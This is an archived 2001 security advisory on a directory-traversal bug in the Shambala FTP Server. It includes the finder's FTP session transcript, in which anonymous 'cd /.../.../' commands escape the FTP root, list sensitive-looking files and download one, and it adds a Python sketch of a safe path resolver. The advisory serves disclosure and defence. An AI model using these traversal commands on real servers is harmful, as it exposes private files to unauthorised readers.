
SecurityTracker
Archives


 


Category:   Application (File Transfer/Sharing)  >   Shambala Server
Vendors:   Evolvable Corporation
Shambala FTP Server Gives Remote Users Access to Any Files on the FTP Server's Drive
SecurityTracker Alert ID:  1001698
SecurityTracker URL:  http://securitytracker.com/id/1001698
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Jun 7 2001
Impact:   Disclosure of system information, Disclosure of user information
Exploit Included:  Yes  

Description:   A vulnerability has been reported in the Shambala FTP server that allows remote users to access files on the server located outside of the server's root directory.

A remote user can change to any directory and view files.

If a remote user sends the command "CWD ..." (or "cd ..." in the default FTP client), the server changes to the parent directory, even when that directory lies above the FTP root.

A transcript of a demonstration exploit scenario is provided in the Source Message.

Impact:   A remote user can traverse the directory tree on the target FTP server and obtain files on the server that are located outside of the FTP server's root document directory.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.evolvable.com/
Cause:   Access control error, Input validation error
Underlying OS:  Windows (NT), Windows (95), Windows (98), Windows (2000)
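
Added example (not part of the advisory and not the vendor's code): the transcript in the Source Message shows "cd .." refused while "cd /.../.../" is accepted, which is consistent with a filter that matches only the literal component "..". That filter is an assumption about the server's logic; it is sketched below next to a resolver that confines CWD to the FTP root. The root C:\ftproot and both function names are constructed for illustration.

```python
import ntpath  # Windows path rules as pure string functions; runs on any OS
from typing import Optional


def naive_check(arg: str) -> bool:
    """Assumed 'before' filter: refuses only a literal '..' component."""
    return all(part != ".." for part in arg.replace("\\", "/").split("/"))


def resolve_cwd(root: str, cwd: str, arg: str) -> Optional[str]:
    """Map an FTP CWD argument to a real path under root, or return None.

    cwd is the session's current virtual directory ('/'-separated, relative
    to the FTP root). None means the server should answer 550.
    """
    arg = arg.replace("\\", "/")
    # Absolute arguments restart at the virtual root, relative ones at cwd.
    virtual = [] if arg.startswith("/") else [p for p in cwd.split("/") if p]
    for part in arg.split("/"):
        if part in ("", "."):
            continue
        if part == "..":
            if not virtual:
                return None  # would climb above the FTP root
            virtual.pop()
            continue
        # Names ending in dots or spaces (including dot-only runs such as
        # '...') are not ordinary names on Windows: trailing dots and spaces
        # are dropped, and Windows 9x walks up extra levels for dot runs.
        # A ':' would introduce a drive letter or an NTFS stream.
        if part.rstrip(". ") != part or ":" in part:
            return None
        virtual.append(part)
    base = ntpath.normpath(root)
    real = ntpath.normpath(ntpath.join(base, *virtual))
    # Independent containment check on the canonical result.
    if ntpath.commonpath([base, real]).lower() != base.lower():
        return None
    return real


if __name__ == "__main__":
    root = r"C:\ftproot"  # constructed sample root
    for arg in ("..", "/.../.../", "/.../.../.../.../", "Web"):
        print(repr(arg), naive_check(arg), resolve_cwd(root, "/", arg))
```

The resolver tracks the virtual directory as a stack and never hands a dot-run to the operating system, so the result does not depend on how a given Windows version interprets "...".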

Message History:   None.


 Source Message Contents

Subject:  Shambala FTP server Directory Traversal



======================================================================


	        Shambala FTP server Directory Traversal


Author: alt3kx! <alt3kx@raza-mexicana.org>
Date: 2001-05-22
Site: www.raza-mexicana.org

Greet to: _0x90_, dr_fdisk^, Dex, PaTa
Teams: Raregazz - X-ploit and S0d

vicente F0x, you don't rule, dude!
======================================================================
------------------------=[Brief Description]=-------------------------

Shambala FTP Server is an FTP server for Windows 9x/NT/2000.
A bug allows any user to change to any directory and see files to PATH,
and also GET files remotely.

----------------------------=[Platforms]=------------------------------

Windows 9.x
Windows NT
Windows 2000


-----------------------------=[Summary]=---------------------------------


When sending the command "CWD ..." (or "cd ..." in the default FTP
client), the server will go one directory up.



Exploit:

alt3kx@machine:/tmp$ ftp 1.xx.xx.xx
Connected to 1.xx.xx.xx.
220 1.xx.xx.xx - Shambala FTP Server Ready.
Name (1.xx.xx.xx:Administrator): anonymous
331 Password required for anonymous.
Password:
230 User anonymous logged in.
ftp> cd ..
550 Requested action not taken. Permission denied.
ftp> pwd
257 "/" is current directory.
ftp> dir
200 PORT command successful.
150 Opening data connection.
  d---------    owner    group          0   21-maj-01 17:50   1.xx.xx.xx
  ----------    owner    group        283   21-maj-01 17:55   index-_-1_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   index-_-2_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   index-_-3_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   index-_-4_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   index-_-5_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   index-_-6_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   index-_-7_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   index-_-8_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   index-_-9_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   index-_-10_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   index-_-11_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   index-_-12_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   index-_-13_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   index-_-14_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   index-_-15_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   index-_-16_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   index-_0_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   index-_0_0_-1.htm
  ----------    owner    group        283   21-maj-01 17:55   .htm
  ----------    owner    group        283   21-maj-01 18:08   index-_0_0_-2.htm
  ----------    owner    group        283   21-maj-01 18:08   index-_0_0_-3.htm
  ----------    owner    group        283   21-maj-01 18:08   index-_0_0_-4.htm
  ----------    owner    group        283   21-maj-01 18:08   index-_0_0_-5.htm
  ----------    owner    group        283   21-maj-01 18:08   index-_0_0_-6.htm
  ----------    owner    group        283   21-maj-01 18:08   index-_0_0_-7.htm
  ----------    owner    group        283   21-maj-01 18:08   index-_0_0_-8.htm
  ----------    owner    group        283   21-maj-01 18:08   index-_0_0_-9.htm
  ----------    owner    group        283   21-maj-01 18:08   index-_0_0_-10.htm
  ----------    owner    group        283   21-maj-01 18:08   index-_0_0_-11.htm
  ----------    owner    group        283   21-maj-01 18:08   index-_0_0_-12.htm
  ----------    owner    group        283   21-maj-01 18:08   index-_0_-1_-11.htm
  ----------    owner    group        283   21-maj-01 18:08   index-_1_0_-11.htm
  ----------    owner    group        283   21-maj-01 18:08   index-_-1_0_-11.htm

226 Transfer complete
ftp> cd ../
550 Requested action not taken. Permission denied.
ftp>

EXPLOIT... ...

ftp> cd /.../.../
257 CWD command successful.
ftp> dir
200 PORT command successful.
150 Opening data connection.
  ----------    owner    group      15444   04-maj-01 14:26   SCAN.log
  ----------    owner    group     140340   04-maj-01 14:05   MAILS-PRESIDENCIA.txt
  ----------    owner    group     466944   18-sep-99 09:32   Shambala.exe
  ----------    owner    group       3564   21-maj-01 17:48   ST6UNST.LOG
  ----------    owner    group         31   21-maj-01 17:50   passwordsxxx.txt
  d---------    owner    group          0   21-maj-01 17:50   Web
226 Transfer complete.
ftp>


ftp> cd /.../.../.../.../
257 CWD command successful.
ftp> dir
200 PORT command successful.
150 Opening data connection.
  ----------    owner    group     246928   18-jan-01 13:10   N6Setup.exe
  d---------    owner    group          0   18-jan-01 15:39   Netscape 6
  d---------    owner    group          0   18-jan-01 14:50   Netscape 6 Setup
  ----------    owner    group    3209110   19-jan-01 10:51   getrgt.exe

.
.
.
.
.

  ----------    owner    group        168   21-maj-01 19:07   raza-alt3kx.txt

ftp> get raza-alt3kx.txt
200 PORT command successful.
150 Opening data connection.
226 Transfer complete.
168 bytes received in 0 seconds (168 bytes/s)
ftp> quit
221 Goodbye.


alt3kx@machine:/tmp$ cat raza-alt3kx.txt


Bug discovered by alt3kx! <alt3kx@raza-mexicana.org>


alt3kx@machine:/tmp$



-------------------------------=[Patch]=------------------------------

The recommended action is to change the permissions or define an
individual directory for anonymous users with files that are not compromising.


-------------------------=[Company Compromise]=-----------------------

http://www.evolvable.com










 
 

